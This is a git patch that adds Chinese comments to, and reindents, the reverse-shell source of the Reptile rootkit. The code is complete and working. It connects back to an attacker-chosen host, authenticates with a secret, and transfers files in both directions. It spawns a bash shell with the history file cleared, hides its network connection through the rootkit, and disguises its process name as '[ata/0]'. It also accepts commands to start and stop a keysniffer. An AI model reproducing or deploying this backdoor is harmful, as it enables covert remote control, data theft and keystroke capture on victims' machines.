From a9b1a596df98ff129f84cb7d29f954376a4e987a Mon Sep 17 00:00:00 2001 From: waiwai <3027307205@qq.com> Date: Sun, 29 Dec 2024 23:03:12 +0800 Subject: [PATCH] =?UTF-8?q?=E8=A1=A5=E5=85=85shell=E6=B3=A8=E9=87=8A?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/Reptile/userland/shell.c | 700 ++++++++++++++++++----------------- 1 file changed, 360 insertions(+), 340 deletions(-) diff --git a/src/Reptile/userland/shell.c b/src/Reptile/userland/shell.c index 92c4834..acca08d 100644 --- a/src/Reptile/userland/shell.c +++ b/src/Reptile/userland/shell.c @@ -15,7 +15,7 @@ #include "config.h" #include "pel.h" -#define ERROR -1 +#define ERROR -1 unsigned char message[BUFSIZE + 1]; extern char *optarg; @@ -23,224 +23,239 @@ char *rcfile; #ifndef _REPTILE_ +// 打印使用说明 void usage(char *argv0) { - fprintf(stderr, "Usage: %s [ -t connect_back_host ] ", argv0); - fprintf(stderr, "[ -p port ] [ -s secret ] [ -r delay (optional) ]\n"); + fprintf(stderr, "Usage: %s [ -t connect_back_host ] ", argv0); + fprintf(stderr, "[ -p port ] [ -s secret ] [ -r delay (optional) ]\n"); } #endif +// 获取文件 int get_file(int client) { - int ret, len, fd; + int ret, len, fd; - ret = pel_recv_msg(client, message, &len); + // 接收文件名 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - if (message[0] == OUT) - return 1; + if (message[0] == OUT) + return 1; - message[len] = '\0'; + message[len] = '\0'; - fd = open((char *)message, O_RDONLY); + // 打开文件 + fd = open((char *)message, O_RDONLY); - if (fd < 0) - return (ERROR); + if (fd < 0) + return (ERROR); - while (1) { - len = read(fd, message, BUFSIZE); + // 读取文件内容并发送 + while (1) { + len = read(fd, message, BUFSIZE); - if (len == 0) - break; - if (len < 0) - return (ERROR); + if (len == 0) + break; + if (len < 0) + return (ERROR); - ret = pel_send_msg(client, message, len); + ret = pel_send_msg(client, message, len); - if (ret != PEL_SUCCESS) - return (ERROR); - } - return 0; + if (ret != PEL_SUCCESS) + return (ERROR); + } + return 0; } +// 上传文件 int put_file(int client) { - int ret, len, fd; + int ret, len, fd; - ret = pel_recv_msg(client, message, &len); + // 接收文件名 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - if (message[0] == OUT) - return (ERROR); + if (message[0] == OUT) + return (ERROR); - message[len] = '\0'; - fd = creat((char *)message, 0644); + message[len] = '\0'; + fd = creat((char *)message, 0644); - if (fd < 0) - return (ERROR); + if (fd < 0) + return (ERROR); - while (1) { - ret = pel_recv_msg(client, message, &len); + // 接收文件内容并写入 + while (1) { + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - if (strncmp((char *)message, EXIT, EXIT_LEN) == 0) - break; + if (strncmp((char *)message, EXIT, EXIT_LEN) == 0) + break; - if (write(fd, message, len) != len) - return (ERROR); - } - return 0; + if (write(fd, message, len) != len) + return (ERROR); + } + return 0; } +// 运行 shell int runshell(int client) { - fd_set rd; - struct winsize ws; - char *slave, *temp, *shell; - int ret, len, pid, pty, tty, n; + fd_set rd; + struct winsize ws; + char *slave, *temp, *shell; + int ret, len, pid, pty, tty, n; - if (openpty(&pty, &tty, NULL, NULL, NULL) < 0) - return (ERROR); + // 打开伪终端 + if (openpty(&pty, &tty, NULL, NULL, NULL) < 0) + return (ERROR); - slave = ttyname(tty); + slave = ttyname(tty); - if (slave == NULL) - return (ERROR); + if (slave == NULL) + return (ERROR); - chdir(HOMEDIR); - putenv("HISTFILE="); + chdir(HOMEDIR); + putenv("HISTFILE="); - ret = pel_recv_msg(client, message, &len); + // 接收终端类型 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - message[len] = '\0'; - setenv("TERM", (char *)message, 1); + message[len] = '\0'; + setenv("TERM", (char *)message, 1); - ret = pel_recv_msg(client, message, &len); + // 接收窗口大小 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS || len != 4) - return (ERROR); + if (ret != PEL_SUCCESS || len != 4) + return (ERROR); - ws.ws_row = ((int)message[0] << 8) + (int)message[1]; - ws.ws_col = ((int)message[2] << 8) + (int)message[3]; - ws.ws_xpixel = 0; - ws.ws_ypixel = 0; + ws.ws_row = ((int)message[0] << 8) + (int)message[1]; + ws.ws_col = ((int)message[2] << 8) + (int)message[3]; + ws.ws_xpixel = 0; + ws.ws_ypixel = 0; - if (ioctl(pty, TIOCSWINSZ, &ws) < 0) - return (ERROR); + if (ioctl(pty, TIOCSWINSZ, &ws) < 0) + return (ERROR); - ret = pel_recv_msg(client, message, &len); + // 接收命令 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - if (len == 1 && message[0] == RUNSHELL) { - temp = (char *)malloc(20 + strlen(rcfile)); + if (len == 1 && message[0] == RUNSHELL) { + temp = (char *)malloc(20 + strlen(rcfile)); - if (temp == NULL) - return (ERROR); + if (temp == NULL) + return (ERROR); - strcpy(temp, "exec bash --rcfile "); - strcat(temp, rcfile); - } else { - message[len] = '\0'; - temp = (char *)malloc(len + 1); + strcpy(temp, "exec bash --rcfile "); + strcat(temp, rcfile); + } else { + message[len] = '\0'; + temp = (char *)malloc(len + 1); - if (temp == NULL) - return (ERROR); + if (temp == NULL) + return (ERROR); - strncpy(temp, (char *)message, len + 1); - } + strncpy(temp, (char *)message, len + 1); + } - pid = fork(); + // 创建子进程 + pid = fork(); - if (pid < 0) { - free(temp); - return (ERROR); - } + if (pid < 0) { + free(temp); + return (ERROR); + } - if (pid == 0) { - close(client); - close(pty); + if (pid == 0) { + close(client); + close(pty); - if (setsid() < 0) { - free(temp); - return (ERROR); - } + if (setsid() < 0) { + free(temp); + return (ERROR); + } - if (ioctl(tty, TIOCSCTTY, NULL) < 0) { - free(temp); - return (ERROR); - } + if (ioctl(tty, TIOCSCTTY, NULL) < 0) { + free(temp); + return (ERROR); + } - dup2(tty, 0); - dup2(tty, 1); - dup2(tty, 2); + dup2(tty, 0); + dup2(tty, 1); + dup2(tty, 2); - if (tty > 2) - close(tty); + if (tty > 2) + close(tty); - shell = (char *)malloc(10); + shell = (char *)malloc(10); - if (shell == NULL) { - free(temp); - return (ERROR); - } + if (shell == NULL) { + free(temp); + return (ERROR); + } - strcpy(shell, "/bin/bash"); + strcpy(shell, "/bin/bash"); - execl(shell, shell + 5, "-c", temp, (char *)0); - free(temp); - free(shell); + execl(shell, shell + 5, "-c", temp, (char *)0); + free(temp); + free(shell); - return 0; - } else { - close(tty); + return 0; + } else { + close(tty); - while (1) { - FD_ZERO(&rd); - FD_SET(client, &rd); - FD_SET(pty, &rd); + // 处理数据传输 + while (1) { + FD_ZERO(&rd); + FD_SET(client, &rd); + FD_SET(pty, &rd); - n = (pty > client) ? pty : client; + n = (pty > client) ? pty : client; - if (select(n + 1, &rd, NULL, NULL, NULL) < 0) - return (ERROR); + if (select(n + 1, &rd, NULL, NULL, NULL) < 0) + return (ERROR); - if (FD_ISSET(client, &rd)) { - ret = pel_recv_msg(client, message, &len); + if (FD_ISSET(client, &rd)) { + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); - if (write(pty, message, len) != len) - return (ERROR); - } + if (ret != PEL_SUCCESS) + return (ERROR); + if (write(pty, message, len) != len) + return (ERROR); + } - if (FD_ISSET(pty, &rd)) { - len = read(pty, message, BUFSIZE); + if (FD_ISSET(pty, &rd)) { + len = read(pty, message, BUFSIZE); - if (len == 0) - break; - if (len < 0) - return (ERROR); + if (len == 0) + break; + if (len < 0) + return (ERROR); - ret = pel_send_msg(client, message, len); + ret = pel_send_msg(client, message, len); - if (ret != PEL_SUCCESS) - return (ERROR); - } - } - return 0; - } + if (ret != PEL_SUCCESS) + return (ERROR); + } + } + return 0; + } } #ifdef _REPTILE_ @@ -249,260 +264,265 @@ int runshell(int client) #define UNHIDE 0 struct control { - unsigned short cmd; - void *argv; + unsigned short cmd; + void *argv; }; +// 隐藏连接 void hide_conn(struct sockaddr_in addr, int hide) { - struct control args; - int sockioctl = socket(AF_INET, SOCK_STREAM, 6); + struct control args; + int sockioctl = socket(AF_INET, SOCK_STREAM, 6); - if (sockioctl < 0) - exit(1); + if (sockioctl < 0) + exit(1); - if (hide) { - args.cmd = 4; - } else { - args.cmd = 5; - } + if (hide) { + args.cmd = 4; + } else { + args.cmd = 5; + } - args.argv = &addr; + args.argv = &addr; - if (ioctl(sockioctl, AUTH, HTUA) == 0) { - if (ioctl(sockioctl, AUTH, &args) == 0) - ioctl(sockioctl, AUTH, HTUA); - } + if (ioctl(sockioctl, AUTH, HTUA) == 0) { + if (ioctl(sockioctl, AUTH, &args) == 0) + ioctl(sockioctl, AUTH, HTUA); + } - close(sockioctl); + close(sockioctl); } #endif +// 构建 rcfile 路径 int build_rcfile_path(void) { - char *name = NAME; - int len = 6 + strlen(name) + strlen(name); + char *name = NAME; + int len = 6 + strlen(name) + strlen(name); - rcfile = (char *)malloc(len); + rcfile = (char *)malloc(len); - if (rcfile == NULL) - return -1; + if (rcfile == NULL) + return -1; - snprintf(rcfile, len, "/%s/%s_rc", name, name); - return 0; + snprintf(rcfile, len, "/%s/%s_rc", name, name); + return 0; } int main(int argc, char **argv) { - int ret, len, pid, opt, client, arg0_len, delay = 0; - short int connect_back_port = 0; - char *connect_back_host = NULL; - char *secret = NULL; - struct sockaddr_in client_addr; - struct hostent *client_host; - socklen_t n; - - while ((opt = getopt(argc, argv, "t:s:p:r:")) != -1) { - switch (opt) { - case 't': - connect_back_host = strdup(optarg); - break; - case 'p': - connect_back_port = atoi(optarg); - if (!connect_back_port) { + int ret, len, pid, opt, client, arg0_len, delay = 0; + short int connect_back_port = 0; + char *connect_back_host = NULL; + char *secret = NULL; + struct sockaddr_in client_addr; + struct hostent *client_host; + socklen_t n; + + // 解析命令行参数 + while ((opt = getopt(argc, argv, "t:s:p:r:")) != -1) { + switch (opt) { + case 't': + connect_back_host = strdup(optarg); + break; + case 'p': + connect_back_port = atoi(optarg); + if (!connect_back_port) { #ifndef _REPTILE_ - usage(*argv); + usage(*argv); #endif - goto out; - } - break; - case 's': - secret = strdup(optarg); - break; - case 'r': - delay = atoi(optarg); - break; - default: + goto out; + } + break; + case 's': + secret = strdup(optarg); + break; + case 'r': + delay = atoi(optarg); + break; + default: #ifndef _REPTILE_ - usage(*argv); + usage(*argv); #endif - exit(1); - break; - } - } + exit(1); + break; + } + } - if (connect_back_host == NULL || connect_back_port == 0 || - secret == NULL) { + if (connect_back_host == NULL || connect_back_port == 0 || + secret == NULL) { #ifndef _REPTILE_ - usage(*argv); + usage(*argv); #endif - goto out; - } - - arg0_len = strlen(argv[0]); - bzero(argv[0], arg0_len); - - if (arg0_len >= 7) - strcpy(argv[0], "[ata/0]"); - - if(argv[1]) - bzero(argv[1], strlen(argv[1])); - - if(argv[2]) - bzero(argv[2], strlen(argv[2])); - - if(argv[3]) - bzero(argv[3], strlen(argv[3])); - - if(argv[4]) - bzero(argv[4], strlen(argv[4])); - - if(argv[5]) - bzero(argv[5], strlen(argv[5])); - - if(argv[6]) - bzero(argv[6], strlen(argv[6])); - - if(argv[7]) - bzero(argv[7], strlen(argv[7])); - - if(argv[8]) - bzero(argv[8], strlen(argv[8])); - - if (build_rcfile_path()) - goto out; - - pid = fork(); - - if (pid < 0) - return (ERROR); - - if (pid != 0) - return 0; - - if (setsid() < 0) - return (ERROR); - - for (n = 0; n < 1024; n++) - close(n); - - do { - if (delay > 0) - sleep(delay); - - client = socket(PF_INET, SOCK_STREAM, 0); - if (client < 0) - continue; - - client_host = gethostbyname(connect_back_host); - if (client_host == NULL) - continue; - - memcpy((void *)&client_addr.sin_addr, - (void *)client_host->h_addr, client_host->h_length); - - client_addr.sin_family = AF_INET; - client_addr.sin_port = htons(connect_back_port); - - ret = connect(client, (struct sockaddr *)&client_addr, - sizeof(client_addr)); - - if (ret < 0) { - close(client); - continue; - } + goto out; + } + + // 隐藏进程名称 + arg0_len = strlen(argv[0]); + bzero(argv[0], arg0_len); + + if (arg0_len >= 7) + strcpy(argv[0], "[ata/0]"); + + if(argv[1]) + bzero(argv[1], strlen(argv[1])); + + if(argv[2]) + bzero(argv[2], strlen(argv[2])); + + if(argv[3]) + bzero(argv[3], strlen(argv[3])); + + if(argv[4]) + bzero(argv[4], strlen(argv[4])); + + if(argv[5]) + bzero(argv[5], strlen(argv[5])); + + if(argv[6]) + bzero(argv[6], strlen(argv[6])); + + if(argv[7]) + bzero(argv[7], strlen(argv[7])); + + if(argv[8]) + bzero(argv[8], strlen(argv[8])); + + if (build_rcfile_path()) + goto out; + + // 创建子进程 + pid = fork(); + + if (pid < 0) + return (ERROR); + + if (pid != 0) + return 0; + + if (setsid() < 0) + return (ERROR); + + for (n = 0; n < 1024; n++) + close(n); + + do { + if (delay > 0) + sleep(delay); + + client = socket(PF_INET, SOCK_STREAM, 0); + if (client < 0) + continue; + + client_host = gethostbyname(connect_back_host); + if (client_host == NULL) + continue; + + memcpy((void *)&client_addr.sin_addr, + (void *)client_host->h_addr, client_host->h_length); + + client_addr.sin_family = AF_INET; + client_addr.sin_port = htons(connect_back_port); + + ret = connect(client, (struct sockaddr *)&client_addr, + sizeof(client_addr)); + + if (ret < 0) { + close(client); + continue; + } #ifdef _REPTILE_ - hide_conn(client_addr, HIDE); + hide_conn(client_addr, HIDE); #endif - ret = pel_server_init(client, secret); + ret = pel_server_init(client, secret); - if (ret != PEL_SUCCESS) { - shutdown(client, 2); + if (ret != PEL_SUCCESS) { + shutdown(client, 2); #ifdef _REPTILE_ - hide_conn(client_addr, UNHIDE); + hide_conn(client_addr, UNHIDE); #endif - continue; - } + continue; + } - connect: + connect: - ret = pel_recv_msg(client, message, &len); + ret = pel_recv_msg(client, message, &len); - if (ret == PEL_SUCCESS || len == 1) { - if (strcmp((char *)message, EXIT) == 0) - goto end; + if (ret == PEL_SUCCESS || len == 1) { + if (strcmp((char *)message, EXIT) == 0) + goto end; - switch (message[0]) { - case GET_FILE: - ret = get_file(client); + switch (message[0]) { + case GET_FILE: + ret = get_file(client); - if (ret) - goto connect; + if (ret) + goto connect; - if (pel_send_msg(client, (unsigned char *)EXIT, - EXIT_LEN) != PEL_SUCCESS) - goto end; + if (pel_send_msg(client, (unsigned char *)EXIT, + EXIT_LEN) != PEL_SUCCESS) + goto end; - goto connect; - case PUT_FILE: - put_file(client); - goto connect; - case RUNSHELL: - runshell(client); - if (pel_send_msg(client, (unsigned char *)EXIT, - EXIT_LEN) != PEL_SUCCESS) - goto end; + goto connect; + case PUT_FILE: + put_file(client); + goto connect; + case RUNSHELL: + runshell(client); + if (pel_send_msg(client, (unsigned char *)EXIT, + EXIT_LEN) != PEL_SUCCESS) + goto end; - goto connect; - case SET_DELAY: - if (pel_recv_msg(client, message, &len) != - PEL_SUCCESS) - goto end; + goto connect; + case SET_DELAY: + if (pel_recv_msg(client, message, &len) != + PEL_SUCCESS) + goto end; - if (message[0] == 5) - goto connect; + if (message[0] == 5) + goto connect; - message[len] = '\0'; - delay = atoi((char *)message); + message[len] = '\0'; + delay = atoi((char *)message); - goto connect; - case 'K': // 添加 keysniffer 命令处理 - if (pel_recv_msg(client, message, &len) != PEL_SUCCESS) - goto end; - if (strcmp((char *)message, "start") == 0) { - start_keysniffer(); + goto connect; + case 'K': // 添加 keysniffer 命令处理 + if (pel_recv_msg(client, message, &len) != PEL_SUCCESS) + goto end; + if (strcmp((char *)message, "start") == 0) { + start_keysniffer(); } - else if (strcmp((char *)message, "stop") == 0) { - stop_keysniffer(); + else if (strcmp((char *)message, "stop") == 0) { + stop_keysniffer(); } if (pel_send_msg(client, (unsigned char *)EXIT, EXIT_LEN) != PEL_SUCCESS) - goto end; + goto end; goto connect; - default: - break; - } - } - end: - shutdown(client, 2); + default: + break; + } + } + end: + shutdown(client, 2); #ifdef _REPTILE_ - hide_conn(client_addr, UNHIDE); + hide_conn(client_addr, UNHIDE); #endif - } while (delay > 0); + } while (delay > 0); out: - if (connect_back_host) - free(connect_back_host); + if (connect_back_host) + free(connect_back_host); - if (secret) - free(secret); + if (secret) + free(secret); - return 0; -} + return 0; +} \ No newline at end of file